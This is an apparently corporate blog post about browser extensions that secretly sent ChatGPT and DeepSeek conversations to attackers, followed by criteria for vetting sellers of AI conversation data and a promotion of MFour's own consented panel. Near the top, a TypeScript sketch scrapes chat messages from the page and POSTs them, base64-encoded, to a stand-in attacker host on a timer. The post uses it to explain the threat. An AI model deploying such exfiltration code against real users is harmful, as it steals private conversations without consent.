The Privacy Threat Hiding in Plain Sight
In January 2026, cybersecurity firm OX Security published findings that two Chrome extensions — collectively installed by more than 900,000 users — had been silently exfiltrating every ChatGPT and DeepSeek conversation to attacker-controlled servers. The extensions requested permission for “anonymous, non-identifiable analytics data” while actually capturing complete conversation content, chat IDs, and full browsing histories every 30 minutes.
Security researcher Moshe Siman Tov Bustan demonstrated the exploit live in a video walkthrough, showing how a single ChatGPT query was encoded in base64 and transmitted — along with the full prompt, response, and browser URL history — to a remote command-and-control server within seconds of being typed.
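To make the mechanism concrete, here is a heavily simplified sketch of what that kind of content-script exfiltration looks like. The selector, endpoint, and payload shape are illustrative assumptions, not the actual extension code:

```typescript
// Simplified sketch of the exfiltration pattern described above. The
// selector, endpoint, and payload are assumptions for illustration only.
const C2_ENDPOINT = "https://attacker.example/collect"; // hypothetical server

function harvestConversation(): string {
  // Scrape every visible chat message out of the page DOM.
  const messages = Array.from(
    document.querySelectorAll<HTMLElement>("[data-message-author-role]") // assumed selector
  ).map((el) => el.innerText);
  return messages.join("\n");
}

async function exfiltrate(): Promise<void> {
  const payload = {
    // Base64-encode the conversation (UTF-8-safe via the classic escape trick).
    conversation: btoa(unescape(encodeURIComponent(harvestConversation()))),
    url: location.href,
  };
  // Fire-and-forget POST to the command-and-control server; the user sees nothing.
  await fetch(C2_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  });
}

// Repeat on the 30-minute cadence OX Security observed.
setInterval(exfiltrate, 30 * 60 * 1000);
```

The point is how little code this takes: any extension granted access to the page can read the full conversation DOM and send it anywhere.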
The story, reported on The Hacker News, didn’t land in a vacuum. It followed similar revelations about Urban VPN Proxy, another extension with millions of installs caught spying on AI conversations. Security research firm Secure Annex gave the tactic a name: Prompt Poaching.
It’s Not Just Bad Actors
Here’s where the story takes a turn most coverage missed.
Secure Annex’s investigation found that prompt poaching isn’t limited to rogue extensions. Legitimate, well-known analytics platforms are doing it too. Similarweb — a publicly traded web analytics company with over a million Chrome extension users — introduced AI conversation monitoring in May 2025. A January 2026 update made it explicit in their terms of service: prompts, queries, uploaded files, images, and AI responses are all collected.
Their updated privacy policy states plainly that “some Sensitive Data may be inadvertently collected or processed” and that while they “take steps, where possible, to remove or filter out identifiers,” they “cannot guarantee that all Personal Data is removed.”
Sensor Tower's StayFocusd extension, with 600,000 users, was flagged for similar behavior.
“It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector,” Secure Annex researcher John Tuckner told The Hacker News. “This is just the beginning of this trend. More firms will begin to realize these insights are profitable.”
Why This Matters Beyond Cybersecurity
The cybersecurity angle is important, but there’s a larger story here for anyone working in consumer intelligence, market research, or brand strategy.
ChatGPT and other generative AI tools have become a primary touchpoint in the consumer journey, which makes the conversations themselves commercially valuable data. And wherever there's value, a supply chain forms. The prompt poaching wave reveals what that supply chain currently looks like: a spectrum running from outright theft, to consent clauses quietly buried in terms of service, to (in rarer cases) transparent, ethical, opt-in, fair-trade first-party collection.
Data collected through nefarious or gray-market channels is not a stable input. Sources built on covert browser surveillance, buried consent, or exploitative collection tend to disappear quickly once exposed. For brands and researchers, this is not only a question of trust but of continuity.
When evaluating ChatGPT conversation data as a signal source, provenance is no longer a nice-to-have consideration. It is the central question.
Five Criteria for Evaluating Any ChatGPT Data Source
Whether you’re a brand insights team, a market research firm, or an enterprise building AI-powered consumer analytics, here’s a framework for vetting any provider claiming to offer ChatGPT conversation data:
1. Consent Mechanism
Ask: Did the consumer explicitly opt in to share their AI conversations — or was consent buried in a terms-of-service update they never read?
The prompt poaching cases reveal a pattern: permissions framed as “anonymous analytics” that actually capture everything. Genuine consent means the consumer understands specifically what they’re sharing, actively agrees to it, and can withdraw at any time. Look for affirmative opt-in, not passive non-objection.
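One practical test: ask whether the provider can produce an auditable consent record for any conversation in their dataset. Here is a minimal sketch of what such a record might contain; every field name is hypothetical:

```typescript
// Hypothetical shape of an auditable consent record. Field names are
// illustrative, not any specific vendor's schema.
interface ConsentRecord {
  panelistId: string;
  scope: "ai_conversations";  // exactly what the consumer agreed to share
  grantedAt: string;          // ISO-8601 timestamp of the affirmative opt-in
  disclosureVersion: string;  // the specific disclosure text they saw
  method: "explicit_opt_in";  // never "tos_update" or "default_on"
  revokedAt: string | null;   // withdrawal must be possible at any time
}

// A provider should be able to produce one of these for every conversation
// in the dataset. If they can't, consent was likely inferred, not given.
const example: ConsentRecord = {
  panelistId: "p-10482",
  scope: "ai_conversations",
  grantedAt: "2026-01-15T09:30:00Z",
  disclosureVersion: "v3.2",
  method: "explicit_opt_in",
  revokedAt: null,
};
```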
2. Fair-Trade Compensation
Ask: Are the people whose conversations you’re analyzing being fairly compensated?
This is the ethical dimension that separates legitimate data businesses from extraction operations. Consumers whose data powers an analytics product deserve a real share of the value exchange, not a free service quietly monetized behind their backs. It is also the difference between a data pipeline that keeps delivering and one that is a cybersecurity threat waiting to be shut down.
3. First-Party Consumer Relationship
Ask: Does the provider have a direct, ongoing relationship with the consumers in the dataset?
A first-party relationship means the data collector knows who their panelists are, can communicate with them, and can attach verified demographics and attributes to each conversation. That context is what turns raw prompts into segmentable intelligence: you can see how conversations differ by age, income, geography, or life stage. Without it, you're left with an undifferentiated blob of conversations that represent no known population, because the people behind them were silently surveilled rather than knowingly enrolled.
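As a sketch of why that context matters: with a verified profile to join against, conversations become segmentable; without one, there is nothing to join. The types and helper below are illustrative, not any particular provider's schema:

```typescript
// Illustrative types: a verified panelist profile joined to each conversation.
interface PanelistProfile {
  panelistId: string;
  ageBand: string; // e.g. "25-34"
  incomeBand: string;
  region: string;
}

interface Conversation {
  panelistId: string;
  prompt: string;
  timestamp: string; // ISO-8601
}

// Group conversations by a demographic attribute for segment-level analysis.
function segmentBy(
  conversations: Conversation[],
  profiles: Map<string, PanelistProfile>,
  attribute: keyof Omit<PanelistProfile, "panelistId">
): Map<string, Conversation[]> {
  const segments = new Map<string, Conversation[]>();
  for (const convo of conversations) {
    const profile = profiles.get(convo.panelistId);
    if (!profile) continue; // surveilled data has no profile to join against
    const key = profile[attribute];
    const bucket = segments.get(key);
    if (bucket) bucket.push(convo);
    else segments.set(key, [convo]);
  }
  return segments;
}
```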
4. PII Handling and Compliance Posture
Ask: Is personally identifiable information scrubbed before the data reaches your systems? What’s the compliance and governance framework?
ChatGPT conversations are uniquely sensitive. People share medical questions, financial details, relationship problems, and proprietary business information with AI chatbots. Any dataset derived from these conversations must have rigorous PII scrubbing, and the provider should be able to articulate their compliance framework clearly — not with vague assurances that they “take steps, where possible.”
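As a toy illustration of the concept only (production scrubbing relies on named-entity recognition and far broader pattern coverage than two regular expressions):

```typescript
// Toy PII-scrubbing pass. Real pipelines use NER models and many more
// patterns; these two regexes only illustrate the idea.
const EMAIL = /[\w.+-]+@[\w-]+\.[\w.]+/g;
const US_PHONE = /\b(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b/g;

function scrubPII(text: string): string {
  return text.replace(EMAIL, "[EMAIL]").replace(US_PHONE, "[PHONE]");
}

scrubPII("Email me at jane.doe@example.com or call 555-867-5309");
// => "Email me at [EMAIL] or call [PHONE]"
```

The key architectural question is where this runs: scrubbing has to happen before the data ever reaches a buyer's systems, not as an after-the-fact cleanup.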
5. Identity Resolution and Behavioral Context
Ask: Can you connect a conversation to anything else that consumer did — or is it just floating text?
A million ChatGPT conversations in isolation tell you what people are asking AI. That’s interesting but incomplete. The real intelligence value emerges when you can connect what a consumer asked ChatGPT to what they did next — what sites they visited, what apps they opened, what stores they walked into, what they bought. Without that connected view, you’re analyzing prompts without outcomes.
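A minimal sketch of what that connected view looks like as data, assuming a shared panelist ID across datasets and a hypothetical seven-day follow-up window:

```typescript
// Illustrative identity resolution: join a conversation to the same
// panelist's subsequent behavioral events. The event kinds and the
// 7-day window are assumptions for the example.
interface BehavioralEvent {
  panelistId: string;
  kind: "web_visit" | "app_open" | "store_visit" | "purchase";
  detail: string;
  timestamp: string; // ISO-8601
}

const FOLLOW_UP_WINDOW_MS = 7 * 24 * 60 * 60 * 1000;

// For one conversation, find what that consumer did next.
function outcomesFor(
  convo: { panelistId: string; timestamp: string },
  events: BehavioralEvent[]
): BehavioralEvent[] {
  const start = Date.parse(convo.timestamp);
  return events.filter((e) => {
    const t = Date.parse(e.timestamp);
    return e.panelistId === convo.panelistId && t > start && t - start <= FOLLOW_UP_WINDOW_MS;
  });
}
```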
About MFour
At MFour, we've been ingesting a million opted-in ChatGPT conversations per month, collected through the #1 research app on the App Store, where 13M+ consumers have a direct, compensated relationship with us under our ethical, fair-trade agreement model.
Every conversation is PII-scrubbed before ingestion. Every consumer explicitly opted in to share their conversation logs, is compensated for their participation, and can opt out at any time. And because these conversations come from our existing consumer panel, each one is linkable to the same person’s app usage, web browsing, GPS-verified location visits, receipt-level purchases, demographics, and survey responses for full consumer journey insights.
See how MFour makes it easy to query the entire data set through AI for immediate insights.